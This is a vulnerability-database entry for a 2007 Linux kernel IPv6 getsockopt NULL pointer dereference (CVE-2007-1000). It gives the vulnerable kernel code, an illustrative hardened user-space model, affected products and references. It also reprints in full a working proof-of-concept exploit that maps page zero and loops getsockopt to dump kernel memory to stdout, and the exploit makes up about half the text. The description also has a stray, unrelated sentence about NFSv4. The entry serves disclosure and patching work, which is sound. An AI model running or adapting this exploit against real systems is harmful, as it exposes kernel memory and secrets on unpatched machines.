Linux Kernel ipv6_getsockopt_sticky Function Denial of Service and Information Disclosure Vulnerability

Vulnerability ID: 1113277    Vulnerability type: Design error
Published: 2007-07-10    Updated: 2007-07-23
CVE ID: CVE-2007-1000    CNNVD-ID: CNNVD-200703-332
Platform: Linux    CVSS score: 7.2
|Vulnerability source
https://www.exploit-db.com/exploits/4172
https://www.securityfocus.com/bid/22904
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200703-332
|Vulnerability details
The Linux kernel is the kernel used by Linux, the open-source operating system released by the Linux Foundation (USA). The NFSv4 implementation is a distributed file system protocol within it. The IPv6-related code in the Linux kernel contains a vulnerability that may lead to denial of service or disclosure of kernel information. The ipv6_getsockopt_sticky() function in net/ipv6/ipv6_sockglue.c of the Linux kernel has a null pointer dereference vulnerability. The vulnerable code is as follows:

    case IPV6_2292PKTOPTIONS:
    {
        struct ipv6_txoptions *opt = NULL;                      /* [1] */
        struct msghdr msg;
        struct flowi fl;
        int junk;

        fl.fl6_flowlabel = 0;
        fl.oif = sk->sk_bound_dev_if;

        if (optlen == 0)
            goto update;                                        /* [2] */
    ...
    update:
        retv = 0;
        if (inet_sk(sk)->is_icsk) {
            if (opt) {
                ...
            }
            opt = xchg(&np->opt, opt);                          /* [3] */
            sk_dst_reset(sk);
        } else {
            write_lock(&sk->sk_dst_lock);
            opt = xchg(&np->opt, opt);                          /* [4] */
            write_unlock(&sk->sk_dst_lock);
            sk_dst_reset(sk);
        }
    ...
    case IPV6_DSTOPTS:
    {

        lock_sock(sk);
        len = ipv6_getsockopt_sticky(sk, np->opt->hopopt,       /* [5] */
                                     optval, len);
        release_sock(sk);
        return put_user(len, optlen);
    }

In do_ipv6_setsockopt(), if optname=IPV6_2292PKTOPTIONS and optlen=0 (as shown at [2]), np->opt is set to NULL (as shown at [3] and [4]). In do_ipv6_getsockopt(), if optname=IPV6_DSTOPTS, np->opt is dereferenced at [5]. An attacker can exploit this vulnerability to read arbitrary kernel memory.
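A user-space model of the missing check, added here as an illustration; it is not the kernel's code and not the upstream fix. The struct and function names are simplified stand-ins (assumptions), and the length rule (hdrlen + 1) * 8 is the IPv6 extension header format. It contrasts the dereference at [5] with a getter that tests np->opt first.

```c
#include <stdio.h>
#include <string.h>

/* Simplified stand-ins (assumptions) for the kernel structures in the excerpt. */
struct tx_options { const unsigned char *hopopt; };  /* raw header: [0]=next hdr, [1]=hdrlen */
struct pinfo { struct tx_options *opt; };  /* np->opt: NULL after the optlen == 0 path */

/* Copy one sticky header to the caller, at most len bytes. */
static int copy_sticky(const unsigned char *hdr, void *out, int len)
{
    int hlen;

    if (!hdr || len <= 0)
        return 0;
    hlen = (hdr[1] + 1) * 8;  /* extension header length in bytes */
    if (len > hlen)
        len = hlen;
    memcpy(out, hdr, (size_t)len);
    return len;
}

/* Pattern at [5]: np->opt is dereferenced before anything checks it. */
int get_hopopt_unchecked(const struct pinfo *np, void *out, int len)
{
    return copy_sticky(np->opt->hopopt, out, len);  /* NULL dereference if opt is NULL */
}

/* Hardened form: test np->opt before selecting a header from it. */
int get_hopopt_checked(const struct pinfo *np, void *out, int len)
{
    const struct tx_options *opt = np->opt;

    if (!opt)
        return 0;  /* no sticky options set: report length 0 */
    return copy_sticky(opt->hopopt, out, len);
}

int main(void)
{
    unsigned char h[8] = { 59, 0, 1, 2, 3, 4, 5, 6 };  /* constructed sample header */
    struct tx_options o = { h };
    struct pinfo set = { &o }, cleared = { NULL };
    unsigned char out[64];

    printf("options set: %d bytes\n", get_hopopt_checked(&set, out, sizeof out));
    printf("np->opt NULL: %d bytes\n", get_hopopt_checked(&cleared, out, sizeof out));
    return 0;
}
```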
|Exploit
/*
 * Linux Kernel IPV6_Getsockopt_Sticky Memory Leak  Proof Of Concept
 * dreyer 07-2007
 * Osu, Tatakae, Sexy Pandas!
 *
 *  Dumps to stdout the memory mapped between INI and END.
 *
 * CVE: CVE-2007-1000  BID: 22904
 *
 *  Affected: Linux Kernel < 2.6.20.2
 *
 * http://bugzilla.kernel.org/show_bug.cgi?id=8134
 *
 * Exploitation based on null pointer dereference: http://lists.immunitysec.com/pipermail/dailydave/2007-March/004133.html
 *
 * For free!!! ( worth 600 EUR in zerobay! )
 *
 */


#include <sys/mman.h>
#include <sys/socket.h>   /* socket, setsockopt, getsockopt */
#include <netinet/in.h>
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>       /* write */

#define HOPOPT_OFFSET 8
#define INIADDR 0xc0100000
#define ENDADDR  0xd0000000
unsigned int i;


int main(int argc, char *argv[]) {
  int s;
  unsigned int optlen;
  void *ptr;
  char value[10240];
  char text[12];

  fprintf(stderr,"Ipv6_getsockopt_sticky vuln POC\n"
                 "dreyer '07 - free feels better\n"
                 "Dumping %p - %p to stdout\n",(void *)INIADDR,(void *)ENDADDR);

  s = socket(AF_INET6, SOCK_STREAM, IPPROTO_TCP);
  
  /* Make np->opt = NULL = 0x00000000  through IPV6_2292PKTOPTIONS */
  setsockopt(s, IPPROTO_IPV6, IPV6_2292PKTOPTIONS, (void *)NULL, 0);

  /* Make 0x00000000 address valid */
  ptr = mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);

  if (ptr != NULL) {
      perror("mmap");
      exit(-1);
  }

  memset(ptr,0,4096);

  /* Make ptr point to np->opt->hopopt =  (0x00000000)->hopopt = 
   * 0x00000000 + 8 */
  ptr=(char *)((char *)ptr+HOPOPT_OFFSET);

  i=INIADDR;
  while(i<ENDADDR) {
      /* Put in hopopt the address we want to read */
      *((int *)ptr)=i;
      optlen=10240;
      /* Get the chunk pointed by hopopt through getsockopt IPV6_DSTOPTS */
      getsockopt(s, IPPROTO_IPV6, IPV6_DSTOPTS, (void *)value, &optlen);
      if(optlen>0) {
          sprintf(text,"\n%08x:",i);
          write(1,text,strlen(text));
          write(1,value,optlen);
          i=i+optlen;
      } else {
          /* We could not read this portion because of some error, skip it */
          i=i+4;
      }
  }

  return 0;
}

// milw0rm.com [2007-07-10]
|Affected products
Ubuntu Ubuntu Linux 6.10 sparc Ubuntu Ubuntu Linux 6.10 powerpc Ubuntu Ubuntu Linux 6.10 i386 Ubuntu Ubuntu Linux 6.10 amd64 Ubuntu Ubuntu Linux 6.06 LTS sparc Ubuntu Ubu
|References

Source: VU#920689
Name: VU#920689
Link: http://www.kb.cert.org/vuls/id/920689
Source: BID
Name: 22904
Link: http://www.securityfocus.com/bid/22904
Source: www.kernel.org
Link: http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.20.2
Source: bugzilla.kernel.org
Link: http://bugzilla.kernel.org/show_bug.cgi?id=8134
Source: issues.rpath.com
Link: https://issues.rpath.com/browse/RPL-1153
Source: MISC
Link: http://www.wslabi.com/wabisabilabi/initPublishedBid.do?
Source: UBUNTU
Name: USN-489-1
Link: http://www.ubuntu.com/usn/usn-489-1
Source: UBUNTU
Name: USN-486-1
Link: http://www.ubuntu.com/usn/usn-486-1
Source: BUGTRAQ
Name: 20070615 rPSA-2007-0124-1 kernel xen
Link: http://www.securityfocus.com/archive/1/471457
Source: REDHAT
Name: RHSA-2007:0169
Link: http://www.redhat.com/support/errata/RHSA-2007-0169.html
Source: OSVDB
Name: 33025
Link: http://www.osvdb.org/33025
Source: MANDRIVA
Name: MDKSA-2007:078
Link: http://www.mandriva.com/security/advisories?name=MDKSA-2007:078
Source: VUPEN
Name: ADV-2007-0907
Link: http://www.frsirt.com/english/advisories/2007/0907
Source: SECUNIA
Name: 26139
Link: http://secunia.com/advisorie